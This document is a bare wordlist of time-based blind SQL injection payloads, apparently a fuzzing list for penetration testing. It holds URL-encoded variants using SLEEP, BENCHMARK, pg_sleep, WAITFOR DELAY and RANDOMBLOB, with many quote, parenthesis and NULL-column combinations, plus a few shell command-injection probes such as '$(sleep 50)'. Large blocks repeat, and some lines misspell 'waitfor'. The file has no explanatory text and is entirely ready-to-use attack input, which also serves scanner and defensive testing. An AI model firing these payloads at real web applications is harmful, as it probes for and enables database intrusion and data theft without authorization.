sleep(5)#
1+and+(select+sleep(5))--+-
1+or+sleep(5)#
"+or+sleep(5)#
'+or+sleep(5)#
1)+or+sleep(5)#
'+or+sleep(5)='
")+or+sleep(5)="
'+AND+(SELECT+'a'+FROM+pg_sleep(5))='a
'||(SELECT+''+FROM+pg_sleep(5))||'
')+or+sleep(5)='
1))+or+sleep(5)#
"))+or+sleep(5)="
'))+or+sleep(5)='
"+or+sleep(5)="
;waitfor+delay+'0:0:5'--
);waitfor+delay+'0:0:5'--
';waitfor+delay+'0:0:5'--
';SELECT+PG_SLEEP(5)--
'||pg_sleep(5)--
'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
'+UNION+SELECT+pg_sleep(5),+NULL#
benchmark(10000000,MD5(1))#
'+union+select+NULL,NULL+from+pg_sleep(5)--
'+union+select+NULL+from+pg_sleep(5)--
'+union+select+NULL,NULL,NULL+from+pg_sleep(5)--
'+union+select+NULL,NULL,NULL,NULL+from+pg_sleep(5)--
'+union+select+NULL,NULL,NULL,NULL,NULL+from+pg_sleep(5)--
'+union+select+NULL,NULL,NULL,NULL,NULL,NULL+from+pg_sleep(5)--
'+union+select+NULL,NULL,NULL,NULL,NULL,NULL,NULL+from+pg_sleep(5)--
"+union+select+NULL,NULL+from+pg_sleep(5)--
"+union+select+NULL+from+pg_sleep(5)--
";waitfor+delay+'0:0:5'--
');waitfor+delay+'0:0:5'--
");waitfor+delay+'0:0:5'--
));waitfor+delay+'0:0:5'--
'));waitfor+delay+'0:0:5'--
"));waitfor+delay+'0:0:5'--
"+union+select+NULL,NULL,NULL+from+pg_sleep(5)--
"+union+select+NULL,NULL,NULL,NULL+from+pg_sleep(5)--
"+union+select+NULL,NULL,NULL,NULL,NULL+from+pg_sleep(5)--
"+union+select+NULL,NULL,NULL,NULL,NULL,NULL+from+pg_sleep(5)--
"+union+select+NULL,NULL,NULL,NULL,NULL,NULL,NULL+from+pg_sleep(5)--
1+or+benchmark(10000000,MD5(1))#
"+or+benchmark(10000000,MD5(1))#
'+or+benchmark(10000000,MD5(1))#
1)+or+benchmark(10000000,MD5(1))#
")+or+benchmark(10000000,MD5(1))#
')+or+benchmark(10000000,MD5(1))#
1))+or+benchmark(10000000,MD5(1))#
"))+or+benchmark(10000000,MD5(1))#
'))+or+benchmark(10000000,MD5(1))#
pg_sleep(5)--
1+or+pg_sleep(5)--
"+or+pg_sleep(5)--
'+or+pg_sleep(5)--
1)+or+pg_sleep(5)--
")+or+pg_sleep(5)--
')+or+pg_sleep(5)--
1))+or+pg_sleep(5)--
"))+or+pg_sleep(5)--
'))+or+pg_sleep(5)--
'+OR+SLEEP(5)+AND+'mjVu'='mjVu
'+AND+(SELECT+1234+FROM+(SELECT(SLEEP(5)))HUST)+AND+'HuSt'='HuSt
'+AND+(SELECT+4952+FROM+(SELECT(SLEEP(5)))HUST)--+HuSt
'+OR+(SELECT+4952+FROM+(SELECT(SLEEP(5)))HUST)--+HuSt
)%20waitfor%20delay%20'0:0:5'%20/*
)%20waitfor%20delay%20'0:0:5'%20--
')%20waitfor%20delay%20'0:0:5'%20/*
')%20waitfor%20delay%20'0:0:5'%20--
")%20waitfor%20delay%20'0:0:5'%20/*
")%20waitfor%20delay%20'0:0:5'%20--
))%20waitfor%20delay%20'0:0:5'%20/*
))%20waitfor%20delay%20'0:0:5'%20--
'))%20waitfor%20delay%20'0:0:5'%20/*
'))%20waitfor%20delay%20'0:0:5'%20--
"))%20waitfor%20delay%20'0:0:5'%20/*
"))%20waitfor%20delay%20'0:0:5'%20--
,NULL)%20waitfor%20delay%20'0:0:5'%20/*
,NULL)%20waitfor%20delay%20'0:0:5'%20--
',NULL)%20waifor%20delay%20'0:0:5'%20/*
',NULL)%20waitfor%20delay%20'0:0:5'%20--
",NULL)%20waitfor%20delay%20'0:0:5'%20/*
",NULL)%20waitfor%20delay%20'0:0:5'%20--
),NULL)%20waitfor%20delay%20'0:0:5'%20/*
),NULL)%20waitfor%20delay%20'0:0:5'%20--
'),NULL)%20waifor%20delay%20'0:0:5'%20/*
'),NULL)%20waitfor%20delay%20'0:0:5'%20--
"),NULL)%20waitfor%20delay%20'0:0:5'%20/*
"),NULL)%20waitfor%20delay%20'0:0:5'%20--
,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
',NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
',NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
",NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
",NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
),NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
),NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
'),NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
'),NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
"),NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
"),NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:5'%20--
AND+(SELECT+*+FROM+(SELECT(SLEEP(5)))bAKL)+AND+'vRxe'='vRxe
AND+(SELECT+*+FROM+(SELECT(SLEEP(5)))YjoC)+AND+'%'='
AND+(SELECT+*+FROM+(SELECT(SLEEP(5)))nQIP)
AND+(SELECT+*+FROM+(SELECT(SLEEP(5)))nQIP)--
AND+(SELECT+*+FROM+(SELECT(SLEEP(5)))nQIP)#
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
or+SLEEP(5)
or+SLEEP(5)#
or+SLEEP(5)--
or+SLEEP(5)="
or+SLEEP(5)='
waitfor+delay+'00:00:05'
waitfor+delay+'00:00:05'--
waitfor+delay+'00:00:05'#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or+benchmark(50000000,MD5(1))
or+benchmark(50000000,MD5(1))--
or+benchmark(50000000,MD5(1))#
pg_SLEEP(5)
pg_SLEEP(5)--
pg_SLEEP(5)#
or+pg_SLEEP(5)
or+pg_SLEEP(5)--
or+pg_SLEEP(5)#
'\"
AnD+SLEEP(5)
AnD+SLEEP(5)--
AnD+SLEEP(5)#
&&SLEEP(5)
&&SLEEP(5)--
&&SLEEP(5)#
'+AnD+SLEEP(5)+ANd+'1
'&&SLEEP(5)&&'1
ORDER+BY+SLEEP(5)
ORDER+BY+SLEEP(5)--
ORDER+BY+SLEEP(5)#
(SELECT+*+FROM+(SELECT(SLEEP(5)))ecMj)
(SELECT+*+FROM+(SELECT(SLEEP(5)))ecMj)#
(SELECT+*+FROM+(SELECT(SLEEP(5)))ecMj)--
+benchmark(3200,SHA1(1))+'
++SLEEP(10)+++'
RANDOMBLOB(500000000/2)
AND+2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
OR+2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND+2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR+2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
SLEEP(1)/*'+or+SLEEP(1)+or+'"+or+SLEEP(1)+or+"*/
sleep(5)#
1+or+sleep(5)#
"+or+sleep(5)#
'+or+sleep(5)#
"+or+sleep(5)="
'+or+sleep(5)='
1)+or+sleep(5)#
")+or+sleep(5)="
')+or+sleep(5)='
1))+or+sleep(5)#
"))+or+sleep(5)="
'))+or+sleep(5)='
;waitfor+delay+'0:0:5'--
);waitfor+delay+'0:0:5'--
';waitfor+delay+'0:0:5'--
";waitfor+delay+'0:0:5'--
');waitfor+delay+'0:0:5'--
");waitfor+delay+'0:0:5'--
));waitfor+delay+'0:0:5'--
'));waitfor+delay+'0:0:5'--
"));waitfor+delay+'0:0:5'--
benchmark(10000000,MD5(1))#
1+or+benchmark(10000000,MD5(1))#
"+or+benchmark(10000000,MD5(1))#
'+or+benchmark(10000000,MD5(1))#
1)+or+benchmark(10000000,MD5(1))#
")+or+benchmark(10000000,MD5(1))#
')+or+benchmark(10000000,MD5(1))#
1))+or+benchmark(10000000,MD5(1))#
"))+or+benchmark(10000000,MD5(1))#
'))+or+benchmark(10000000,MD5(1))#
'+AND+(SELECT+1234+FROM+(SELECT(SLEEP(5)))HUST)+AND+'HuSt'='HuSt
'+AND+(SELECT+4952+FROM+(SELECT(SLEEP(5)))HUST)--+HuSt
'+OR+(SELECT+4952+FROM+(SELECT(SLEEP(5)))HUST)--+HuSt
sleep(5)#
1+or+sleep(5)#
"+or+sleep(5)#
'+or+sleep(5)#
"+or+sleep(5)="
'+or+sleep(5)='
1)+or+sleep(5)#
")+or+sleep(5)="
')+or+sleep(5)='
1))+or+sleep(5)#
"))+or+sleep(5)="
'))+or+sleep(5)='
;waitfor+delay+'0:0:5'--
);waitfor+delay+'0:0:5'--
';waitfor+delay+'0:0:5'--
";waitfor+delay+'0:0:5'--
');waitfor+delay+'0:0:5'--
");waitfor+delay+'0:0:5'--
));waitfor+delay+'0:0:5'--
'));waitfor+delay+'0:0:5'--
"));waitfor+delay+'0:0:5'--
benchmark(10000000,MD5(1))#
1+or+benchmark(10000000,MD5(1))#
"+or+benchmark(10000000,MD5(1))#
'+or+benchmark(10000000,MD5(1))#
1)+or+benchmark(10000000,MD5(1))#
")+or+benchmark(10000000,MD5(1))#
')+or+benchmark(10000000,MD5(1))#
1))+or+benchmark(10000000,MD5(1))#
"))+or+benchmark(10000000,MD5(1))#
'))+or+benchmark(10000000,MD5(1))#
pg_sleep(5)--
1+or+pg_sleep(5)--
"+or+pg_sleep(5)--
'+or+pg_sleep(5)--
1)+or+pg_sleep(5)--
")+or+pg_sleep(5)--
')+or+pg_sleep(5)--
1))+or+pg_sleep(5)--
"))+or+pg_sleep(5)--
'))+or+pg_sleep(5)--
AND+(SELECT+*+FROM+(SELECT(SLEEP(5)))bAKL)+AND+'vRxe'='vRxe
AND+(SELECT+*+FROM+(SELECT(SLEEP(5)))YjoC)+AND+'%'='
AND+(SELECT+*+FROM+(SELECT(SLEEP(5)))nQIP)
AND+(SELECT+*+FROM+(SELECT(SLEEP(5)))nQIP)--
AND+(SELECT+*+FROM+(SELECT(SLEEP(5)))nQIP)#
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
or+SLEEP(5)
or+SLEEP(5)#
or+SLEEP(5)--
or+SLEEP(5)="
or+SLEEP(5)='
waitfor+delay+'00:00:05'
waitfor+delay+'00:00:05'--
waitfor+delay+'00:00:05'#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or+benchmark(50000000,MD5(1))
or+benchmark(50000000,MD5(1))--
or+benchmark(50000000,MD5(1))#
pg_SLEEP(5)
pg_SLEEP(5)--
pg_SLEEP(5)#
or+pg_SLEEP(5)
or+pg_SLEEP(5)--
or+pg_SLEEP(5)#
'\"
AnD+SLEEP(5)
AnD+SLEEP(5)--
AnD+SLEEP(5)#
&&SLEEP(5)
&&SLEEP(5)--
&&SLEEP(5)#
'+AnD+SLEEP(5)+ANd+'1
'&&SLEEP(5)&&'1
ORDER+BY+SLEEP(5)
ORDER+BY+SLEEP(5)--
ORDER+BY+SLEEP(5)#
(SELECT+*+FROM+(SELECT(SLEEP(5)))ecMj)
(SELECT+*+FROM+(SELECT(SLEEP(5)))ecMj)#
(SELECT+*+FROM+(SELECT(SLEEP(5)))ecMj)--
+benchmark(3200,SHA1(1))+'
++SLEEP(5)+++'
RANDOMBLOB(500000000/2)
AND+2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
OR+2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND+2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR+2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
SLEEP(5)/*'+or+SLEEP(5)+or+'"+or+SLEEP(5)+or+"*/
";waitfor+delay+'0:0:5'--
1)+or+pg_sleep(5)--
"+or+sleep(5)#
pg_sleep(5)--
1)+or+sleep(5)#
1+waitfor+delay+'0:0:5'--
)+or+sleep(5)='
));waitfor+delay+'0:0:5'--
a'+waitfor+delay+'0:0:5'--
1+or+sleep(5)#
+or+pg_sleep(5)--"
"));waitfor+delay+'0:0:5'--
%20'sleep%2050'
1))+or+pg_sleep(5)--
%20$(sleep%2050)
+or+pg_sleep(5)--
)+or+sleep(5)=
)+or+pg_sleep(5)--
+or+sleep(5)#
+or+sleep(5)='
;waitfor+delay+'0:0:5'--
");waitfor+delay+'0:0:5'--
))+or+sleep(5)="""
")+or+pg_sleep(5)--
1+or+pg_sleep(5)--
))+or+pg_sleep(5)--
1))+or+sleep(5)#
);waitfor+delay+'0:0:5'--
))+or+sleep(5)='
))+or+pg_sleep(5)--"